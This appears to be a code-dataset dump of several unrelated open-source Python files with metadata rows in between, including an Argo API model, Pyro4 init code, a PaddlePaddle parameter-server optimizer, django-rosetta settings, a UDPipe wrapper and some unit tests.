# to site 1
request = RequestFactory().get('/', data={'site__exact': 2})
request.session = {}
# As before, the query count is inflated by doing additional lookups
# because there's a site param in the request
with self.assertNumQueries(FuzzyInt(11, 20)):
# this user shouldn't have access to site 2
request.user = USERS[1]
self.assertTrue(not has_page_add_permission(request))
self.assertTrue(not has_page_change_permission(request))
self.assertEqual({'add': False, 'change': False, 'delete': False},
site._registry[Page].get_model_perms(request))
# but, going back to the first user, they should.
request = RequestFactory().get('/', data={'site__exact': 2})
request.user = USERS[0]
self.assertTrue(has_page_add_permission(request))
self.assertTrue(has_page_change_permission(request))
self.assertEqual({'add': True, 'change': True, 'delete': False},
site._registry[Page].get_model_perms(request))
def test_has_page_add_permission_with_target(self):
page = create_page('Test', 'nav_playground.html', 'en')
user = self._create_user('user')
request = RequestFactory().get('/', data={'target': page.pk})
request.session = {}
request.user = user
has_perm = has_page_add_permission(request)
self.assertFalse(has_perm)
| 42.204452
| 268
| 0.623745
|
c233b2022d684678db25849bbf7a0f042c12bafb
| 4,234
|
py
|
Python
|
argo/workflows/client/models/v1_event_source.py
|
argentumcode/argo-client-python
|
31c1519056379d3f046d4b522f37af87243fdbb4
|
[
"Apache-2.0"
] | null | null | null |
argo/workflows/client/models/v1_event_source.py
|
argentumcode/argo-client-python
|
31c1519056379d3f046d4b522f37af87243fdbb4
|
[
"Apache-2.0"
] | null | null | null |
argo/workflows/client/models/v1_event_source.py
|
argentumcode/argo-client-python
|
31c1519056379d3f046d4b522f37af87243fdbb4
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Argo Server API
You can get examples of requests and responses by using the CLI with `--gloglevel=9`, e.g. `argo list --gloglevel=9` # noqa: E501
The version of the OpenAPI document: v3.0.4
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from argo.workflows.client.configuration import Configuration
class V1EventSource(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'component': 'str',
'host': 'str'
}
attribute_map = {
'component': 'component',
'host': 'host'
}
def __init__(self, component=None, host=None, local_vars_configuration=None): # noqa: E501
"""V1EventSource - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._component = None
self._host = None
self.discriminator = None
if component is not None:
self.component = component
if host is not None:
self.host = host
@property
def component(self):
"""Gets the component of this V1EventSource. # noqa: E501
Component from which the event is generated. # noqa: E501
:return: The component of this V1EventSource. # noqa: E501
:rtype: str
"""
return self._component
@component.setter
def component(self, component):
"""Sets the component of this V1EventSource.
Component from which the event is generated. # noqa: E501
:param component: The component of this V1EventSource. # noqa: E501
:type: str
"""
self._component = component
@property
def host(self):
"""Gets the host of this V1EventSource. # noqa: E501
Node name on which the event is generated. # noqa: E501
:return: The host of this V1EventSource. # noqa: E501
:rtype: str
"""
return self._host
@host.setter
def host(self, host):
"""Sets the host of this V1EventSource.
Node name on which the event is generated. # noqa: E501
:param host: The host of this V1EventSource. # noqa: E501
:type: str
"""
self._host = host
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1EventSource):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, V1EventSource):
return True
return self.to_dict() != other.to_dict()
| 28.039735
| 134
| 0.575342
|
6275a6c8371cb82cb34dc2ce1473127489fb1b91
| 2,694
|
py
|
Python
|
src/Pyro4/__init__.py
|
gabehack/Pyro4
|
88f88bf1ccdfaff8c2bbbda8fc032a145d07d44b
|
[
"MIT"
] | null | null | null |
src/Pyro4/__init__.py
|
gabehack/Pyro4
|
88f88bf1ccdfaff8c2bbbda8fc032a145d07d44b
|
[
"MIT"
] | null | null | null |
src/Pyro4/__init__.py
|
gabehack/Pyro4
|
88f88bf1ccdfaff8c2bbbda8fc032a145d07d44b
|
[
"MIT"
] | null | null | null |
"""
Pyro package. Some generic init stuff to set up logging etc.
Pyro - Python Remote Objects. Copyright by Irmen de Jong (irmen@razorvine.net).
"""
import sys
if sys.version_info < (2, 7):
import warnings
warnings.warn("This Pyro version is unsupported on Python versions older than 2.7", ImportWarning)
def _configLogging():
"""Do some basic config of the logging module at package import time.
The configuring is done only if the PYRO_LOGLEVEL env var is set.
If you want to use your own logging config, make sure you do
that before any Pyro imports. Then Pyro will skip the autoconfig.
Set the env var PYRO_LOGFILE to change the name of the autoconfigured
log file (default is pyro.log in the current dir). Use '{stderr}' to
make the log go to the standard error output."""
import os
import logging
level = os.environ.get("PYRO_LOGLEVEL")
logfilename = os.environ.get("PYRO_LOGFILE", "pyro.log")
if logfilename == "{stderr}":
logfilename = None
if level not in (None, ""):
levelvalue = getattr(logging, level)
if len(logging.root.handlers) == 0:
# configure the logging with some sensible defaults.
try:
import tempfile
tempfile = tempfile.TemporaryFile(dir=".")
tempfile.close()
except OSError:
# cannot write in current directory, use the default console logger
logging.basicConfig(level=levelvalue)
else:
# set up a basic logfile in current directory
logging.basicConfig(
level=levelvalue,
filename=logfilename,
datefmt="%Y-%m-%d %H:%M:%S",
format="[%(asctime)s.%(msecs)03d,%(name)s,%(levelname)s] %(message)s"
)
log = logging.getLogger("Pyro4")
log.info("Pyro log configured using built-in defaults, level=%s", level)
else:
# PYRO_LOGLEVEL is not set, disable Pyro logging. No message is printed about this fact.
log = logging.getLogger("Pyro4")
log.setLevel(9999)
_configLogging()
del _configLogging
# initialize Pyro's configuration
from Pyro4.configuration import Configuration
config = Configuration()
del Configuration
# import the required Pyro symbols into this package
from Pyro4.core import URI, Proxy, Daemon, callback, batch, async, oneway, expose, behavior, current_context
from Pyro4.naming import locateNS, resolve
from Pyro4.futures import Future
from Pyro4.constants import VERSION as __version__
| 38.485714
| 109
| 0.636971
|
f786f665ad438c80988455824d6a206e3e240120
| 9,658
|
py
|
Python
|
python/paddle/distributed/fleet/meta_optimizers/ps_optimizer.py
|
Li-fAngyU/Paddle
|
e548f65f96697830035a28f9070b40829408ccdb
|
[
"Apache-2.0"
] | 1
|
2022-03-14T23:22:21.000Z
|
2022-03-14T23:22:21.000Z
|
python/paddle/distributed/fleet/meta_optimizers/ps_optimizer.py
|
Li-fAngyU/Paddle
|
e548f65f96697830035a28f9070b40829408ccdb
|
[
"Apache-2.0"
] | null | null | null |
python/paddle/distributed/fleet/meta_optimizers/ps_optimizer.py
|
Li-fAngyU/Paddle
|
e548f65f96697830035a28f9070b40829408ccdb
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
from paddle import fluid
import paddle.distributed.passes
from .meta_optimizer_base import MetaOptimizerBase
from paddle.fluid import core
import subprocess
import re
import os
import platform
from paddle.distributed.ps.utils.public import *
from paddle.distributed.passes import PassContext
from ..base.private_helper_function import wait_server_ready
from paddle.distributed.ps.utils.ps_factory import PsProgramBuilderFactory
class ParameterServerOptimizer(MetaOptimizerBase):
def __init__(self, optimizer):
super(ParameterServerOptimizer, self).__init__(optimizer)
self.inner_opt = optimizer
# we do not allow meta optimizer to be inner optimizer currently
self.meta_optimizers_white_list = []
def _set_basic_info(self, loss, role_maker, user_defined_optimizer,
user_defined_strategy):
super(ParameterServerOptimizer, self)._set_basic_info(
loss, role_maker, user_defined_optimizer, user_defined_strategy)
def _set_origin_programs(self, losses):
self.origin_main_programs = []
for loss in losses:
self.origin_main_programs.append(loss.block.program)
def _init_ps_pass_context(self, loss, startup_program):
self.pass_ctx = PassContext()
attrs = {}
# trainer
attrs["env"] = get_dist_env()
attrs['loss'] = loss
attrs['min_block_size'] = 81920
attrs['origin_main_program'] = loss.block.program
attrs['origin_startup_program'] = startup_program
attrs['origin_main_programs'] = self.origin_main_programs
attrs['cloned_main'] = attrs['origin_main_program'].clone()
attrs['cloned_startup'] = attrs['origin_startup_program'].clone()
attrs['user_defined_strategy'] = self.user_defined_strategy
attrs['valid_strategy'] = self.user_defined_strategy
attrs['trainer'] = TrainerRuntimeConfig(self.user_defined_strategy)
attrs['ps_mode'] = attrs['trainer'].mode
logger.info("ps_mode: {}".format(attrs['ps_mode']))
attrs['role_maker'] = self.role_maker
attrs[
'is_heter_ps_mode'] = self.role_maker._is_heter_parameter_server_mode
attrs['is_worker'] = self.role_maker._is_worker()
attrs['is_server'] = self.role_maker._is_server()
attrs['is_heter_worker'] = self.role_maker._is_heter_worker()
logger.info("this process is heter? {}".format(attrs[
'is_heter_worker']))
attrs['use_ps_gpu'] = self.user_defined_strategy.a_sync_configs[
"use_ps_gpu"]
attrs['lr_decay_steps'] = self.user_defined_strategy.a_sync_configs[
"lr_decay_steps"]
attrs['k_steps'] = self.user_defined_strategy.a_sync_configs["k_steps"]
attrs['launch_barrier'] = self.user_defined_strategy.a_sync_configs[
"launch_barrier"]
attrs['launch_barrier_flag'] = int(
os.getenv("FLAGS_LAUNCH_BARRIER", "1"))
build_var_distributed(attrs)
# server
attrs['_main_server'] = fluid.Program()
attrs['_startup_server'] = fluid.Program()
attrs['tensor_table'] = {}
self.pass_ctx._attrs = attrs
def _is_graph_out(self):
return False
def _can_apply(self):
if self.role_maker._is_collective:
return False
k_steps = self.user_defined_strategy.a_sync_configs["k_steps"]
return True if k_steps >= 0 else False
def minimize_impl(self,
loss,
startup_program=None,
parameter_list=None,
no_grad_set=None):
self.inner_opt.minimize(loss, startup_program, parameter_list,
no_grad_set)
if startup_program == None:
startup_program = paddle.static.default_startup_program()
print("program after inner optimizer minimize:",
str(loss.block.program))
self._set_origin_programs([loss])
self._init_ps_pass_context(loss, startup_program)
ps_builder = PsProgramBuilderFactory()._create_ps_program_builder(
self.pass_ctx)
ps_builder._build_programs()
return None, None
def minimize_losses_impl(self,
losses,
startup_program=None,
parameter_list=None,
no_grad_set=None):
if parameter_list is None:
parameter_list = [None] * len(losses)
for idx, loss in enumerate(losses):
startup_prog = startup_program[idx]
parameters = parameter_list[idx]
self.inner_opt.minimize(loss, startup_prog, parameters, no_grad_set)
self._set_origin_programs(losses)
for idx, loss in enumerate(losses):
print("ps_optimizer idx loss:", idx, loss)
startup_prog = startup_program[idx]
self._init_ps_pass_context(loss, startup_prog)
ps_builder = PsProgramBuilderFactory()._create_ps_program_builder(
self.pass_ctx)
ps_builder._build_programs()
startup_program[idx] = self.pass_ctx._attrs['cloned_startup']
return None, None
def _can_apply_geo(self, program):
def get_sys_free_mem():
plat = platform.system()
if platform.system() == "Darwin":
vm = subprocess.Popen(
['vm_stat'], stdout=subprocess.PIPE).communicate()[0]
# Process vm_stat
vmLines = vm.split('\n')
sep = re.compile(r':[\s]+')
vmStats = {}
for row in range(1, len(vmLines) - 2):
rowText = vmLines[row].strip()
rowElements = sep.split(rowText)
vmStats[(rowElements[0]
)] = int(rowElements[1].strip(r'\.')) * 4096
return vmStats["Pages free"]
elif platform.system() == "Linux":
mems = {}
with open('/proc/meminfo', 'rb') as f:
for line in f:
fields = line.split()
mems[fields[0]] = int(fields[1]) * 1024
free = mems[b'MemFree:']
return free
else:
raise ValueError(
"%s platform is unsupported is parameter server optimizer" %
(platform.system()))
if not isinstance(self.inner_opt, fluid.optimizer.SGDOptimizer):
return False
free = get_sys_free_mem()
processed_var_names = set(["@EMPTY@"])
param_memory_size = 0
for varname in program.global_block().vars:
var = program.global_block().vars[varname]
if not var.persistable or var.desc.type(
) != core.VarDesc.VarType.LOD_TENSOR:
continue
set_var_lod_type(var)
param_memory_size += get_var_mem_size(var)
processed_var_names.add(varname)
upper_mem_use = param_memory_size * 5.0
program_tmp_vars = dict()
eval_batch_size = 1024
for op in program.global_block().ops:
for var_name in op.output_arg_names:
if var_name in processed_var_names:
continue
processed_var_names.add(var_name)
var = program.global_block().vars[var_name]
if var.desc.type() != core.VarDesc.VarType.LOD_TENSOR:
continue
data_count = 1
neg_dim_count = 0
for x in var.shape:
if x < 0:
if neg_dim_count >= 1:
raise ValueError(
"Var %s has more than one negative dim." %
(var_name))
neg_dim_count += 1
data_count *= (-x)
else:
data_count *= x
program_tmp_vars[var_name] = (
data_count, neg_dim_count,
vars_metatools.dtype_to_size[var.dtype])
for varname in program_tmp_vars:
data_count, neg_dim_count, type_size = program_tmp_vars[varname]
if neg_dim_count == 1:
data_count *= eval_batch_size
var_memory = data_count * type_size
upper_mem_use += var_memory
if upper_mem_use < free:
return True
else:
return False
def _enable_strategy(self, dist_strategy, context):
if dist_strategy.a_sync_configs["k_steps"] >= 0:
return
dist_strategy.a_sync = True
is_geo = self._can_apply_geo(context["origin_main_program"])
dist_strategy.a_sync_configs["k_steps"] = 800 if is_geo else 0
def _disable_strategy(self, dist_strategy):
dist_strategy.a_sync = False
dist_strategy.a_sync_configs["k_steps"] = -1
| 40.241667
| 81
| 0.600331
|
59be8783e2fa8437177fc778968a3e3b8b05ee80
| 3,268
|
py
|
Python
|
parserV3.py
|
fcanavate/tfm-embeddings
|
a03b5004f32679ae3eec955e93a3e62960f06158
|
[
"MIT"
] | null | null | null |
parserV3.py
|
fcanavate/tfm-embeddings
|
a03b5004f32679ae3eec955e93a3e62960f06158
|
[
"MIT"
] | null | null | null |
parserV3.py
|
fcanavate/tfm-embeddings
|
a03b5004f32679ae3eec955e93a3e62960f06158
|
[
"MIT"
] | null | null | null |
# This file is part of UDPipe <http://github.com/ufal/udpipe/>.
#
# Copyright 2016 Institute of Formal and Applied Linguistics, Faculty of
# Mathematics and Physics, Charles University in Prague, Czech Republic.
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import ufal.udpipe
# ufal.udpipe.Model etc. are SWIG-magic and cannot be detected by pylint
# pylint: disable=no-member
class Model:
def __init__(self, path):
"""Load given model."""
self.model = ufal.udpipe.Model.load(path)
if not self.model:
raise Exception("Cannot load UDPipe model from file '%s'" % path)
def tokenize(self, text):
"""Tokenize the text and return list of ufal.udpipe.Sentence-s."""
tokenizer = self.model.newTokenizer(self.model.DEFAULT)
if not tokenizer:
raise Exception("The model does not have a tokenizer")
return self._read(text, tokenizer)
def read(self, text, in_format):
"""Load text in the given format (conllu|horizontal|vertical) and return list of ufal.udpipe.Sentence-s."""
input_format = ufal.udpipe.InputFormat.newInputFormat(in_format)
if not input_format:
raise Exception("Cannot create input format '%s'" % in_format)
return self._read(text, input_format)
def _read(self, text, input_format):
input_format.setText(text)
error = ufal.udpipe.ProcessingError()
sentences = []
sentence = ufal.udpipe.Sentence()
while input_format.nextSentence(sentence, error):
sentences.append(sentence)
sentence = ufal.udpipe.Sentence()
if error.occurred():
raise Exception(error.message)
return sentences
def tag(self, sentence):
"""Tag the given ufal.udpipe.Sentence (inplace)."""
self.model.tag(sentence, self.model.DEFAULT)
def parse(self, sentence):
"""Parse the given ufal.udpipe.Sentence (inplace)."""
self.model.parse(sentence, self.model.DEFAULT)
def write(self, sentences, out_format):
"""Write given ufal.udpipe.Sentence-s in the required format (conllu|horizontal|vertical)."""
output_format = ufal.udpipe.OutputFormat.newOutputFormat(out_format)
output = ''
for sentence in sentences:
output += output_format.writeSentence(sentence)
output += output_format.finishDocument()
return output
# Can be used as
#model = Model('english-ud-1.2-160523.udpipe')
#model = Model('english-lines-ud-2.4-190531.udpipe')
model = Model('spanish-ancora-ud-2.4-190531.udpipe')
def parse(sentence):
sentence1 = model.tokenize(sentence)
n=0
for s in sentence1:
n=n+1
model.tag(s)
model.parse(s)
conllu = model.write(sentence1, "conllu")
#print (conllu)
conllu1=conllu.splitlines()
parsedsentence=[]
for i in range(4,len(conllu1)):
conllu2=conllu1[i].split("\t")
parsedsentence.append(conllu2)
return (parsedsentence)
#ejemplo=parse("el rey es bueno")
#print (ejemplo)
#print (ejemplo[1][2])
| 36.719101
| 115
| 0.656977
|
1d1adf71d0a1aa3fa47884ccf9f7f7e5cb961420
| 3,997
|
py
|
Python
|
rosetta/conf/settings.py
|
matthiask/django-rosetta
|
401fab90d8f7a77cc7969f4e33bce9efd1e6128e
|
[
"MIT"
] | null | null | null |
rosetta/conf/settings.py
|
matthiask/django-rosetta
|
401fab90d8f7a77cc7969f4e33bce9efd1e6128e
|
[
"MIT"
] | null | null | null |
rosetta/conf/settings.py
|
matthiask/django-rosetta
|
401fab90d8f7a77cc7969f4e33bce9efd1e6128e
|
[
"MIT"
] | null | null | null |
from django.conf import settings
# Number of messages to display per page.
MESSAGES_PER_PAGE = getattr(settings, 'ROSETTA_MESSAGES_PER_PAGE', 10)
# Enable Google translation suggestions
ENABLE_TRANSLATION_SUGGESTIONS = getattr(settings, 'ROSETTA_ENABLE_TRANSLATION_SUGGESTIONS', False)
# Can be obtained for free here: https://translate.yandex.com/apikeys
YANDEX_TRANSLATE_KEY = getattr(settings, 'YANDEX_TRANSLATE_KEY', None)
# See here to obtain a free Azure key and enable the Translator Text service:
# https://docs.microsoft.com/en-us/azure/cognitive-services/Translator/translator-text-how-to-signup
AZURE_CLIENT_SECRET = getattr(settings, 'AZURE_CLIENT_SECRET', None)
# Displays this language beside the original MSGID in the admin
MAIN_LANGUAGE = getattr(settings, 'ROSETTA_MAIN_LANGUAGE', None)
# Change these if the source language in your PO files isn't English
MESSAGES_SOURCE_LANGUAGE_CODE = getattr(settings, 'ROSETTA_MESSAGES_SOURCE_LANGUAGE_CODE', 'en')
MESSAGES_SOURCE_LANGUAGE_NAME = getattr(settings, 'ROSETTA_MESSAGES_SOURCE_LANGUAGE_NAME', 'English')
ACCESS_CONTROL_FUNCTION = getattr(
settings, 'ROSETTA_ACCESS_CONTROL_FUNCTION', None)
"""
When running WSGI daemon mode, using mod_wsgi 2.0c5 or later, this setting
controls whether the contents of the gettext catalog files should be
automatically reloaded by the WSGI processes each time they are modified.
Notes:
* The WSGI daemon process must have write permissions on the WSGI script file
(as defined by the WSGIScriptAlias directive.)
* WSGIScriptReloading must be set to On (it is by default)
* For performance reasons, this setting should be disabled in production environments
* When a common rosetta installation is shared among different Django projects,
each one running in its own distinct WSGI virtual host, you can activate
auto-reloading in individual projects by enabling this setting in the project's
own configuration file, i.e. in the project's settings.py
Refs:
* http://code.google.com/p/modwsgi/wiki/ReloadingSourceCode
* http://code.google.com/p/modwsgi/wiki/ConfigurationDirectives#WSGIReloadMechanism
"""
WSGI_AUTO_RELOAD = getattr(settings, 'ROSETTA_WSGI_AUTO_RELOAD', False)
UWSGI_AUTO_RELOAD = getattr(settings, 'ROSETTA_UWSGI_AUTO_RELOAD', False)
# Exclude applications defined in this list from being translated
EXCLUDED_APPLICATIONS = getattr(settings, 'ROSETTA_EXCLUDED_APPLICATIONS', ())
# Line length of the updated PO file
POFILE_WRAP_WIDTH = getattr(settings, 'ROSETTA_POFILE_WRAP_WIDTH', 78)
# Storage class to handle temporary data storage
STORAGE_CLASS = getattr(settings, 'ROSETTA_STORAGE_CLASS', 'rosetta.storage.CacheRosettaStorage')
ENABLE_REFLANG = getattr(settings, 'ROSETTA_ENABLE_REFLANG', False)
# Allow overriding of the default filenames, you mostly won't need to change this
POFILENAMES = getattr(settings, 'ROSETTA_POFILENAMES', ('django.po', 'djangojs.po'))
ROSETTA_CACHE_NAME = getattr(settings, 'ROSETTA_CACHE_NAME', 'rosetta'
if 'rosetta' in settings.CACHES else 'default')
# Require users to be authenticated (and Superusers or in group "translators").
# Set this to False at your own risk
ROSETTA_REQUIRES_AUTH = getattr(settings, 'ROSETTA_REQUIRES_AUTH', True)
# Exclude paths defined in this list from being searched (usually ends with "locale")
ROSETTA_EXCLUDED_PATHS = getattr(settings, 'ROSETTA_EXCLUDED_PATHS', ())
# Set to True to enable language-specific groups, which can be used to give
# different translators access to different languages. Instead of creating a
# 'translators` group, create individual per-language groups, e.g.
# 'translators-de', 'translators-fr', ...
ROSETTA_LANGUAGE_GROUPS = getattr(settings, 'ROSETTA_LANGUAGE_GROUPS', False)
# Determines whether the MO file is automatically compiled when the PO file is saved.
AUTO_COMPILE = getattr(settings, 'ROSETTA_AUTO_COMPILE', True)
SHOW_AT_ADMIN_PANEL = getattr(settings, 'ROSETTA_SHOW_AT_ADMIN_PANEL', False)
| 44.910112
| 101
| 0.794846
|
75e4e9f05e0aad359d31acf92f99c1df9c5fb430
| 8,958
|
py
|
Python
|
HealthManagementSystem.py
|
chhajednidhish/Basic-Python-Projects
|
d0bbff6ae8eeb126c5c38489772f8bdd7185f283
|
[
"MIT"
] | null | null | null |
HealthManagementSystem.py
|
chhajednidhish/Basic-Python-Projects
|
d0bbff6ae8eeb126c5c38489772f8bdd7185f283
|
[
"MIT"
] | null | null | null |
HealthManagementSystem.py
|
chhajednidhish/Basic-Python-Projects
|
d0bbff6ae8eeb126c5c38489772f8bdd7185f283
|
[
"MIT"
] | null | null | null |
'''
HEALTH MANAGEMENT SYSTEM
Problem statement:
1. You have 3 clients namely; Nidhish, Mann, Karan
2. You will make 3 files to log their food and 3 files to log their excercises
Write a function that wehn executed takes an input as client name and the thing he wants to log
that is excercise/food.
Use getDate function and use it as
example - [time using getdate] Food eaten
3. Make one more function to retrieve data from the given files
'''
# Initializing variables
clientList = {1:"Nidhish", 2:"Mann", 3:"Karan"}
dataList = {1:"Food", 2:"Excercise"}
# To get the current time of the system
def getDate():
import datetime
return datetime.datetime.now()
# Defining the function to log data
def logData():
# Displaying clients list to the user
print("\nWhom do you want to log data for?")
print("\nClients list...")
for key,clientName in clientList.items():
print(key, clientName, sep=":")
# Selecting the client from client's list
try:
clientChoice = int(input("Enter your choice: "))
if clientChoice == 1: # If user wants to log data for Nidhish
# Displaying things which can be logged
print("What do you want to log?\nOptions are...")
for key,things in dataList.items():
print(key, things, sep=":")
try:
thingsChoice = int(input("Enter your choice: "))
if thingsChoice == 1: # If user wants to log food data
with open("Nidhish's Food Log.txt","a") as fileInstance:
food = input("What did you eat?: ")
fileInstance.write(f"[{getDate()}] = {food} \n")
elif thingsChoice == 2: # If user wants to log excercise data
with open("Nidhish's Excercise Log.txt","a") as fileInstance:
exc = input("What did you excercise?: ")
fileInstance.write(f"[{getDate()}] = {exc} \n")
else:
print("Please enter a valid input!")
except Exception:
print("Please enter a valid input!")
elif clientChoice == 2: # If user wants to log data for Mann
print("What do you want to log?\nOptions are...")
for key,things in dataList.items():
print(key, things, sep=":")
try:
thingsChoice = int(input("Enter your choice: "))
if thingsChoice == 1: # If user wants to log food data
with open("Mann's Food Log.txt","a") as fileInstance:
food = input("What did you eat?: ")
fileInstance.write(f"[{getDate()}] = {food} \n")
elif thingsChoice == 2: # If user wants to log excercise data
with open("Mann's Excercise Log.txt","a") as fileInstance:
exc = input("What did you excercise?: ")
fileInstance.write(f"[{getDate()}] = {exc} \n")
else:
print("Please enter a valid input!")
except Exception:
print("Please enter a valid input!")
elif clientChoice == 3: # If user wants to log data for Karan
print("What do you want to log?\nOptions are...")
for key,things in dataList.items():
print(key, things, sep=":")
try:
thingsChoice = int(input("Enter your choice: "))
if thingsChoice == 1: # If user wants to log food data
with open("Karan's Food Log.txt","a") as fileInstance:
food = input("What did you eat?: ")
fileInstance.write(f"[{getDate()}] = {food} \n")
elif thingsChoice == 2: # If user wants to log excercise data
with open("Karan's Excercise Log.txt","a") as fileInstance:
exc = input("What did you excercise?: ")
fileInstance.write(f"[{getDate()}] = {exc} \n")
else:
print("Please enter a valid input!")
except Exception:
print("Please enter a valid input!")
else:
print("Please enter a valid input!")
except Exception:
print("Please enter a valid input!")
# Defining the function to retrieve data
def retrieveData():
# Displaying clients list to the user
print("\nWhom do you want to retrieve data for?")
print("\nClients list...")
for key,clientName in clientList.items():
print(key, clientName, sep=":")
# Selecting the client from client's list
try:
clientChoice = int(input("Enter your choice: "))
if clientChoice == 1: # If user wants to retrieve data for Nidhish
print("\nWhat do you want to retrieve?\nOptions are...")
for key,things in dataList.items():
print(key, things, sep=":")
try:
thingsChoice = int(input("Enter your choice: "))
if thingsChoice == 1: # If user wants to retrieve food data
with open("Nidhish's Food Log.txt","r") as fileInstance:
print("Food log...")
print(fileInstance.read())
elif thingsChoice == 2: # If user wants to retrieve excercise data
with open("Nidhish's Excercise Log.txt","r") as fileInstance:
print("Excercise log...")
print(fileInstance.read())
else:
print("Please enter a valid input!")
except Exception:
print("Please enter a valid input!")
elif clientChoice == 2: # If user wants to retrieve data for Mann
print("\nWhat do you want to retrieve?\nOptions are...")
for key,things in dataList.items():
print(key, things, sep=":")
try:
thingsChoice = int(input("Enter your choice: "))
if thingsChoice == 1: # If user wants to retrieve food data
with open("Mann's Food Log.txt","r") as fileInstance:
print("Food log...")
print(fileInstance.read())
elif thingsChoice == 2: # If user wants to retrieve excercise data
with open("Mann's Excercise Log.txt","r") as fileInstance:
print("Excercise log...")
print(fileInstance.read())
else:
print("Please enter a valid input!")
except Exception:
print("Please enter a valid input!")
elif clientChoice == 3: # If user wants to retrieve data for Karan
print("\nWhat do you want to retrieve?\nOptions are...")
for key,things in dataList.items():
print(key, things, sep=":")
try:
thingsChoice = int(input("Enter your choice: "))
if thingsChoice == 1: # If user wants to retrieve food data
with open("Karan's Food Log.txt","r") as fileInstance:
print("Food log...")
print(fileInstance.read())
elif thingsChoice == 2: # If user wants to retrieve excercise data
with open("Karan's Excercise Log.txt","r") as fileInstance:
print("Excercise log...")
print(fileInstance.read())
else:
print("Please enter a valid input!")
except Exception:
print("Please enter a valid input!")
else:
print("Please enter a valid input!")
except Exception:
print("Please enter a valid input!")
def main():
# Introducing system to the user
print("""\t\t\t\t\t\tWelcome to Nidhish's Health Management System!
\n\t\t\t\tHere you can manage your client's food and excercise data according to the time.
\t\t\tYou have two options! Either you can log your client's data or you can retrieve your client's data.""")
contVar = 'y' # Variable to decide if the user wants to continue the process
while contVar == 'y' or contVar == 'Y':
try:
# Taking input for what the user wants to do first
print("\nWhat do you want to do?\n1. Log data\n2. Retrieve data")
dataChoice = int(input("Enter your choice: "))
if dataChoice == 1:
logData()
elif dataChoice == 2:
retrieveData()
else:
print("Please enter a valid input!")
except Exception as e:
print("Please enter a valid input!")
contVar = input("Do you want to continue? y or n?: ")
contVar.lower()
if __name__ == "__main__":
main()
| 47.903743
| 109
| 0.537285
|
637e2ccbeece72420a4b9447108225eb6bb5afdb
| 2,971
|
py
|
Python
|
senlin_tempest_plugin/tests/api/clusters/test_cluster_create.py
|
openstack/senlin-tempest-plugin
|
f71166b2c6619746ac24614ed151e4befdb1f495
|
[
"Apache-2.0"
] | 7
|
2017-10-31T13:31:20.000Z
|
2020-01-08T02:36:37.000Z
|
senlin_tempest_plugin/tests/api/clusters/test_cluster_create.py
|
openstack/senlin-tempest-plugin
|
f71166b2c6619746ac24614ed151e4befdb1f495
|
[
"Apache-2.0"
] | null | null | null |
senlin_tempest_plugin/tests/api/clusters/test_cluster_create.py
|
openstack/senlin-tempest-plugin
|
f71166b2c6619746ac24614ed151e4befdb1f495
|
[
"Apache-2.0"
] | 1
|
2018-01-10T20:36:55.000Z
|
2018-01-10T20:36:55.000Z
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.lib import decorators
from senlin_tempest_plugin.common import utils
from senlin_tempest_plugin.tests.api import base
class TestClusterCreate(base.BaseSenlinAPITest):
def setUp(self):
super(TestClusterCreate, self).setUp()
profile_id = utils.create_a_profile(self)
self.addCleanup(utils.delete_a_profile, self, profile_id)
self.profile_id = profile_id
# TODO(Anyone): The following line is an example to use api_microversion
# decorator. It is not necessary for this test case. Remove it after any
# usage of api_microversion decorator is added.
@utils.api_microversion('1.0')
@decorators.idempotent_id('61cbe340-937a-40d5-9d2f-067f2c7cafcc')
def test_cluster_create_all_attrs_defined(self):
# Create cluster
name = 'test-cluster'
desired_capacity = 2
min_size = 1
max_size = 3
metadata = {'k1': 'v1'}
timeout = 120
params = {
'cluster': {
'profile_id': self.profile_id,
'desired_capacity': desired_capacity,
'min_size': min_size,
'max_size': max_size,
'timeout': timeout,
'metadata': {'k1': 'v1'},
'name': name
}
}
res = self.client.create_obj('clusters', params)
# Verify resp of cluster create API
self.assertEqual(202, res['status'])
self.assertIsNotNone(res['body'])
self.assertIn('actions', res['location'])
cluster = res['body']
for key in ['created_at', 'data', 'domain', 'id', 'init_at', 'nodes',
'policies', 'profile_id', 'profile_name', 'project',
'status', 'status_reason', 'updated_at', 'user']:
self.assertIn(key, cluster)
self.assertIn(name, cluster['name'])
